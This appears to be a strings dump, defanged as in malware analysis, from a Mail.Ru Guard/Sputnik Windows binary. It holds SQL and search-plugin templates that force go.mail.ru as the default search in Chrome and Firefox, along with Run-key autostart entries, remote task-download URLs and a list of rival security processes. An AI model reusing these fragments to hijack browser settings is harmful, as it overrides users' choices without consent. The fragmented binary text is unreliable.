?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?load_object_data@?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_iarchive@234@PAXI@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?save_object_data@?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@UBEXAAVbasic_oarchive@234@PBX@Z
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
GetProcessHeap
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ReportEventA
ADVAPI32.dll
FindExecutableW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
PSAPI.DLL
USERENV.dll
WTSAPI32.dll
CRYPT32.dll
VERSION.dll
CreateIoCompletionPort
GetCPInfo
ShellExecuteExW
CoInternetParseUrl
urlmon.dll
PeekNamedPipe
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
zcÁ
.?AV?$_Ref_count_obj@VAuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VAuditFirefox@mailru@@@std@@
.?AVAuditFirefox@mailru@@
.?AVCheckerFirefox@AuditFirefox@mailru@@
.?AVCheckerHomepageFirefox@AuditFirefox@mailru@@
.?AVCheckerDefaultSearchFirefox@AuditFirefox@mailru@@
.?AVCheckerVbmFirefox@AuditFirefox@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmFirefox@AuditFirefox@mailru@@@std@@
.?AVAuditGoogleChrome@mailru@@
.?AVCheckerCh@AuditGoogleChrome@mailru@@
.?AVCheckerHomepageCh@AuditGoogleChrome@mailru@@
.?AVCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@
.?AVCheckerVbmCh@AuditGoogleChrome@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Func_base@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8b00b026c9439ae5ee123b07f29330c6>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d67d694cf66593a3e1cbe5e0ac457329>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVsettings@firefox@mailru@@
.?AVvisual_bookmarks@firefox@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_852549d506963e7e0155e6efc072a19d>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8f47c682880de3b4c07e24e1559f18fc>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$thread_data@V?$bind_t@XV?$mf0@XVRemoteTasksExecuter@mailru@@@_mfi@boost@@V?$list1@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@@_bi@3@@_bi@boost@@@detail@boost@@
.?AV?$thread_data@V?$bind_t@XV?$mf1@XVRemoteTasksExecuter@mailru@@ABV?$shared_ptr@VTaskInterface@mailru@@@std@@@_mfi@boost@@V?$list2@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@V?$value@V?$shared_ptr@VTaskInterface@mailru@@@std@@@23@@_bi@3@@_bi@boost@@@detail@boost@@
.?AVTaskOneTimeWithChromeAutorunPatch@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_36e85ead181c17858a3fd5b6f23c888c>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d71f87b5d93256d8ef11999b81c97114>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_ff52a01b8c5e4b0628fdb56e2a8b3e6f>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVwindows_file_codecvt@@
.PAUattribute_name_info_tag@v2s_mt_nt5@log@boost@@
.?AVexception@sqlite@mailru@@
.?AV?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@
.?AU?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@
.?AUProcessKey@sysinfo@mailru@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
Inappropriate I/O control opera
8888888
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
< <$<(<,<
0 0$0(0,0
313C3O3a3m3r3
0%0s0
343f3
8:X:#;i;n;};
8(8&:5:_:
;";';&<5<[<
9%9U9u9
3?4X4
8œ9h9
:&:;:@:{:
4"414&585
0"0)00090
3%3s3
2/2x2c3}3
9$9(9,90949
878<8[8`8
77R7c7o7v7
5#6-676\6
8 8%8*888
? ?$?(?,?0?4?8?
8 8$8(8,8&9
2%3u3z3
9 9$9(9,9
5 5$5(5,50545~5
6$6,666<6
2"2(22282*323
2#20262=2^2
5"=)=2=9=
708}8!:(:
7 7-787@7_7
1 1$1(1,1
0'0-020@0
3#323@3#525@5
: :$:(:,:0:4:
5,5054585<5@5
3 3$3(3,3034383<3
5 5$5(5,50545
4 4$4(4,484<4
6 6$6(6,6064686<6
8 8$8(8,8084888<8
9(9,90949|9
=@>\>`>|>
< <$<0<@<
> >$>(>,>0>4>8><>
8 8$8(8,808
? ?$?(?,?0?4?8?<?
1 1$1(1,101
6 6$6(6,6064686<6@6
8 8$8(8,8084888<8@8
1 1$1(1,1014181<1@1
6 6$6(6,6
2$2,282\2|2
7,787@7`7
2,282\2|2
3 3(343\3
7,787\7|7
:,:8:@:`:
?(?4?<?\?
>$>,>8>\>|>
;(;4;<;\;
1$1,181`1
0 0(040\0
1 1(1,1|1
2 202@2`2
> >$>(>,>0>|>
praetorian.exe
qipguard.exe
BrowserManager.exe
BrowserManagerGUI.exe
QHActiveDefense.exe
QHSafeTray.exe.exe
QHWatchdog.exe
GuardMailRu.exe
JMail.Ru\Sputnik\Report
hXXp://xml.binupdate.mail.ru/audit_config.mrdj
Start new check operation
o failed to parse. New report Created
restore mail.ru for:
operation_type
checker->Check failed, msg =
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetched
FFExtensions/FFVbm/Url
Hp/Url
Dse/Url
Vbm/Url
Google\Chrome\User Data\Safe Browsing Extension Blacklist
Advapi32.dll
MGoogle/Chrome/User Data
Google/Chrome/Application
Software\Policies\Google\Chrome
hXXp://xml.binupdate.mail.ru/ext_storage.mrdj
Google Chrome
Google/Chrome/User Data/Default
Google/Chrome/Application/chrome.exe
Software/Google/Chrome/BLBeacon
URLS
manifest.json
sqlite3_reset
sqlite3_exec
Web Data
chrome.exe
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
No go.mail.ru in chromium
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT * FROM keywords
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
INSERT INTO keywords
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id, prepopulate_id FROM keywords
' WHERE key = 'Default Search Provider ID'
' WHERE key = 'Default Search Provider ID Backup'
SELECT value FROM meta WHERE key = 'version'
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
%SUGGEST_URL%
^(chrome-extension://)?(\w{32})?/?
Software/Google/Chrome/Extensions
Sync Data Backup/SyncData.sqlite3
hXXps://clients2.google.com/service/update2/crx
hXXp://xml.binupdate.mail.ru/guard/mrids.mrdj?
Extension from url installed
DefaultSearchProviderSearchURL
DefaultSearchProviderKeyword
&%1$=%2%
mmail.ru
VVV.mail.ru
VVV.go.mail.ru
common_process.exe
{27116687-8CD6-4A82-BA83-5099C3A885BF}
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
{1079004F-E4EF-4A44-9D1F-7C9CE09CE258}
{901B414B-72A2-48C6-8DCD-29388B8B3E40}
{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}
{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}
{ADAC3638-040C-498C-845A-F89B99705444}
{4519D3B5-465C-4AE2-A905-960CA7D5385C}
{F581DE96-9AA1-45C8-8335-B7445525371A}
{DCEF19BB-AB61-48F4-A7CB-6D677D90D1C2}
{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}
{11A1974E-9BEF-4B50-8E2F-9F25FC775BD1}
{3E57F3FE-4397-4DEA-A19A-760BFCD24242}
{603A8599-628C-4F00-A940-A09F1583A23E}
{D33EDE61-8E43-4C1F-9371-6A240B4DA5C9}
{C74622AC-AC0B-44E5-BDC2-EE39A5FD9EC9}
{ABCAA0D8-A892-481F-9492-ACC63768F659}
{8DC7BF6A-58F3-4740-B600-34E37FFADC21}
{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}
{96AF929E-B8EB-499E-99A8-095E4262BE26}
{027940D4-10B8-43B6-9707-A4EE47618E1D}
{45DA0BF7-F31B-4360-BF9A-8E7374A78916}
{5552B451-2086-4B64-82C6-732B18E41FCD}
{F9CC112D-19A0-455B-8D85-F5E9CB7D5914}
{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}
{CFB9F60E-912D-43B3-91C9-9E06AE17ADE0}
{3CE4F0C3-2143-491F-8F20-27792166C41F}
{66CD85E0-6D8E-444E-9D71-AED8BA171A26}
{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}
{14737ADB-9F88-47E8-A76F-D365509795AC}
chrome-extension://clpdgmdkdnijjbgmnajolnbnjejoeogm/visual-bookmarks.html
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
chrome-extension://dhngkpgdbpbkopndlpkicfaiffphdkbo/visual-bookmarks.html
)Software\AppDataLow\Software\Mail.Ru\IE_Bar
Software\Mail.Ru\IE_Bar
Software/Mail.Ru/Updater
Software\Mail.Ru\Flags
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Microsoft/Windows/CurrentVersion/Run
SOFTWARE/Mail.Ru
@Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrds.mail.ru/update/2/
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}
firefox.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
amigo.exe
nichrome.exe
browser.exe
Yandex.Browser.New
Software/Mail.Ru/ChromeInstaller
hXXp://xml.binupdate.mail.ru/guard/update/version.xml
F777C640-57F8-4ECE-A40B-F571D25C2EFE
.html
opera
launcher.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
google chrome
firefox
Microsoft/Windows/Start Menu
Microsoft/Windows/
tsearch-metadata.json
prefs.js
sessionstore.js
places.sqlite
cookies.sqlite
Mozilla\Firefox\profiles.ini
Mozilla\Firefox
Lsearch.json
Mozilla Firefox
mailru.xml
<SearchPlugin xmlns="hXXp://VVV.mozilla.org/2006/browser/search/" xmlns:os="hXXp://a9.com/-/spec/opensearch/1.1/">
@Mail.Ru</os:ShortName>
@Mail.Ru</os:Description>
<SearchForm>hXXp://VVV.mail.ru/</SearchForm>
<os:Url type="application/x-suggestions json" method="GET" template="hXXp://suggests.go.mail.ru/ff3?q={searchTerms}"></os:Url>
<os:Url type="text/html" method="GET" template="hXXp://go.mail.ru/search"><os:Param name="q" value="{searchTerms}"/>%PARAMS%%RFR%</os:Url>
extensions.ini
ini keys failed
extensions.json
extensions.json not parsed!
localstore.rdf
extensions.sqlite
PMail.Ru\Tmp\ffvisualbookmarks.7z
install.rdf
d.autoreg
extensions.rdf
extensions.cache
install_options.xml
@Mail.Ru
Mail.ru
Firefox
File: %s
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
couldn't create instance of IUrlHistoryStg2
EnumUrls failed
FaviconURLFallback
SuggestionsURL
ie.reg
[-HKEY_USERS\
import
reg.exe
*.dll
%1%version.txt?type=%2%&GUID=%3%&rfr=%4%
metric successfully send, url =
metric send failed, url =
Mail.Ru/Id
Software\Microsoft\Windows\CurrentVersion\Run
Software\Mail.ru\Tech\ptls
Software/Mail.Ru/Guard
R.delay
Mail.Ru/mrst
hXXp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?
url_argument
key_arg
^(http[s]?:\/\/)?(www\.)?([\w\.-] )([:\/].*)?$
Remote tasks execution started
hXXp://xml.binupdate.mail.ru/tasks.mrdj?
added task to executing task array
Software/Microsoft/Windows/CurrentVersion/Run
Syahoo.com
webalta.ru
yambler.net
yafinder.com
Found mail.ru extension of type
KhXXp://mailruupdater.cdnmail.ru/MailRuUpdater.exe
5Software\Mail.ru\Tech\ptls
SSoftware\Mail.Ru
Allow service process execute task
--uac-passed
mru_uac_passed
Guard@Mail\.ru
SwReporter
